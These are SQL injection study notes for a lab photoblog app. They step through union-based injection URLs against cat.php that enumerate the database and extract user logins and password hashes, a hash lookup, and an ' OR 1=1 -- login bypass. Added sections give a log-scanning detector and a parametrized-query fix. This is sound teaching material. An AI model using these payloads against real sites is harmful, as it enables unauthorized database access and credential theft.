SQL Injection Quick Notes

Uploaded by

maaryamrh
SQL INJECTION QUICK NOTES

WORKING WITH BACK END DATABASE:

mysql -u root                    Connects to the MySQL database management system.

show databases;                  Show databases.

use photoblog;                   Select the photoblog database.

show tables;                     Show tables.

select * from users;             Show "users" table content.

select * from pictures;          Show "pictures" table content.

show columns from users;         Show users table structure.

show columns from pictures;      Show pictures table structure.

select * from pictures union select * from users;
                                 Shows an error: the two select queries have different numbers of columns.

select title from pictures union select login from users;
                                 Show column title from pictures concatenated with column login from users.

select title,img from pictures union select login,password from users;
                                 Show columns title,img from pictures concatenated with columns login,password from users.

quit                             Quits mysql.

ifconfig                         Get the machine's IP address.

WORKING WITH FRONT END WEB SITE:

In what follows, replace the IP address by your machine's IP address.

http://192.168.1.144/cat.php?id=1
===> select * from pictures where cat=1
==> Show pictures of category 1

http://192.168.1.144/cat.php?id=2
===> select * from pictures where cat=2
==> Show other pictures, those of category 2

http://192.168.1.144/cat.php?id=2%
===> select * from pictures where cat=2%
==> Show error

http://192.168.1.144/cat.php?id=2-1
===> select * from pictures where cat=2-1
==> Show pictures of category 1 (the database evaluates 2-1, which shows that the parameter is placed unquoted into the query)

http://192.168.1.144/cat.php?id=1+1
===> select * from pictures where cat=1 + 1
==> Show error (in a URL the + is decoded as a space, so the database does not receive a valid expression)

http://192.168.1.144/cat.php?id=1 union select 1
===> select * from pictures where cat=1 union select 1
==> Show error, as the number of columns in the left select statement is different from the right select statement

http://192.168.1.144/cat.php?id=1 union select 1,2
===> select * from pictures where cat=1 union select 1,2
==> Show error, as the number of columns in the left select statement is different from the right select statement

http://192.168.1.144/cat.php?id=1 union select 1,2,3
===> select * from pictures where cat=1 union select 1,2,3
==> Show error, as the number of columns in the left select statement is different from the right select statement

http://192.168.1.144/cat.php?id=1 union select 1,2,3,4
===> select * from pictures where cat=1 union select 1,2,3,4
==> No error: the left select statement has 4 columns.
The image and its title come from column number 2 of both the left and the right select statement, so in the SQL injection steps that follow the hacker uses column number 2 of the injected select as the slot whose value is displayed on the page.

http://192.168.1.144/cat.php?id=1 union select 1,@@version,3,4
==> Show the MySQL version.

http://192.168.1.144/cat.php?id=1 union select 1,current_user(),3,4
==> Show the current MySQL user.

http://192.168.1.144/cat.php?id=1 union select 1,database(),3,4
==> Show the currently used database: photoblog.

http://192.168.1.144/cat.php?id=1 union select 1,table_name,3,4 from information_schema.tables
==> Show the names of all tables known to the MySQL DBMS. We clearly see the database tables: categories, pictures and users.

http://192.168.1.144/cat.php?id=1 union select 1,column_name,3,4 from information_schema.columns
==> Show the column names of all tables known to the MySQL DBMS. We clearly see the columns login and password, which belong to the table users.

http://192.168.1.144/cat.php?id=1 union select 1,login,3,4 from users
==> The hacker could get the user logins easily.

http://192.168.1.144/cat.php?id=1 union select 1,password,3,4 from users
==> The hacker could get the user passwords easily. Here the password is encrypted (stored as a hash).

http://192.168.1.144/cat.php?id=1 union select 1,concat(login,%27:%27,password),3,4 from users
==> The hacker could get user login and password together easily (%27 is the URL encoding of the single quote). Here the password is encrypted (stored as a hash).

Go to the website www.md5online.org and try to decrypt the encrypted password (look up its MD5 hash). The password is "P4ssw0d".
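As an added example that is not part of the original notes, here is the check a defender would run over the web server's access log for the probes listed above: every one of them has in common that the id parameter of cat.php is no longer a plain integer, and the union/information_schema ones are rated higher. The log lines are constructed to replay the notes' URLs; the client addresses and timestamps are made up.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache-style access log lines replaying the probes from the notes
# against the lab host; they are sample data, not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /cat.php?id=1 HTTP/1.1" 200 1532
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /cat.php?id=2% HTTP/1.1" 500 211
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /cat.php?id=2-1 HTTP/1.1" 200 1532
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /cat.php?id=1+union+select+1,2,3,4 HTTP/1.1" 200 1601
10.0.0.5 - - [01/Jan/2024:10:00:06 +0000] "GET /cat.php?id=1+union+select+1,table_name,3,4+from+information_schema.tables HTTP/1.1" 200 2210
10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /index.php HTTP/1.1" 200 880
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
NUMERIC = re.compile(r"^\d+$")           # cat.php?id= is a category number, nothing else
KEYWORDS = ("union", "select", "information_schema", "@@version", "concat(")

def inspect_line(line):
    """Return a finding for a cat.php request whose id is not a plain integer, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if parts.path != "/cat.php":
        return None
    # parse_qs decodes %xx and '+' the same way PHP does before the value reaches the query
    for value in parse_qs(parts.query, keep_blank_values=True).get("id", []):
        if NUMERIC.match(value):
            continue
        hits = [k for k in KEYWORDS if k in value.lower()]
        return {
            "ip": m.group("ip"),
            "status": int(m.group("status")),   # a 500 corroborates the "Show error" probes
            "id": value,
            "keywords": hits,
            "severity": "high" if hits else "low",  # union probe vs. mere tampering (2%, 2-1)
        }
    return None

def scan(log_text):
    return [f for f in map(inspect_line, log_text.splitlines()) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```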

SIMPLE EXERCISE:

In the following section we will create our own table and try to hack it.

mysql -u root                    Connects to the MySQL database management system.

use photoblog;                   Select the photoblog database.

CREATE TABLE employee (employee_name varchar(250), employee_job varchar(250));
                                 Creates the table employee.

INSERT INTO employee (employee_name, employee_job) VALUES ('Ali Baba', 'cartoon');
                                 Inserts the first record into the employee table.

INSERT INTO employee (employee_name, employee_job) VALUES ('Samir Sabri', 'actor');
                                 Inserts the second record into the employee table.

SELECT * from employee;          View employee table content.

Go back to the browser and continue.

http://192.168.1.144/cat.php?id=1 union select 1,employee_name,3,4 from employee
==> Show employee names.

http://192.168.1.144/cat.php?id=1 union select 1,concat(employee_name,%27:%27,employee_job),3,4 from employee
==> Show employee names and jobs.

Hacking techniques over login page:

If you enter login=jsmith and password=demo1234, your query in the back end becomes:

SELECT * from users where login='jsmith' and password='demo1234';

If you enter login=' and password=a, your query in the back end becomes the following (the extra quote leaves the statement unbalanced, so the database returns a syntax error):

SELECT * from users where login=''' and password='a';

If you enter login=' OR 1=1 -- and password=demo1234, your query in the back end becomes the following (the -- comments out the rest of the line, so the password check is never evaluated and the condition is true for every row):

SELECT * from users where login='' OR 1=1 --' and password='demo1234';

Parametrized queries:

String query = "SELECT * FROM users WHERE login = ? AND password = ?";
PreparedStatement pstmt = connection.prepareStatement(query);
pstmt.setString(1, "' OR 1=1 --");
pstmt.setString(2, "demo1234");
ResultSet rs = pstmt.executeQuery();

===> SQL will search for users with login = ' OR 1=1 -- and password = demo1234. The injected script is bound as a plain value and is not considered part of the SQL statement.
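To make the difference concrete, here is an added example (not from the notes) in Python with an in-memory SQLite users table standing in for the lab's table: the same ' OR 1=1 -- input returns every user when the query is built by string concatenation and nothing when it is bound as a parameter, and the lone ' input raises a syntax error only in the concatenated form.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the notes' users table; not the lab's real data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (login TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('jsmith', 'demo1234'), ('admin', 'P4ssw0d')")
    return conn

def login_concat(conn, login, password):
    """The vulnerable form: the user's input is pasted into the SQL text, as in the notes."""
    sql = f"SELECT login FROM users WHERE login='{login}' AND password='{password}'"
    try:
        return sorted(row[0] for row in conn.execute(sql))
    except sqlite3.Error as exc:
        # login=' yields login=''' ... : the unbalanced quote breaks the statement
        return f"error: {exc}"

def login_param(conn, login, password):
    """The parametrized form: ? placeholders, values bound separately by the driver."""
    sql = "SELECT login FROM users WHERE login=? AND password=?"
    return sorted(row[0] for row in conn.execute(sql, (login, password)))

if __name__ == "__main__":
    db = make_db()
    for user, pw in [("jsmith", "demo1234"), ("'", "a"), ("' OR 1=1 --", "demo1234")]:
        print(repr(user), "concat:", login_concat(db, user, pw), "| param:", login_param(db, user, pw))
```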
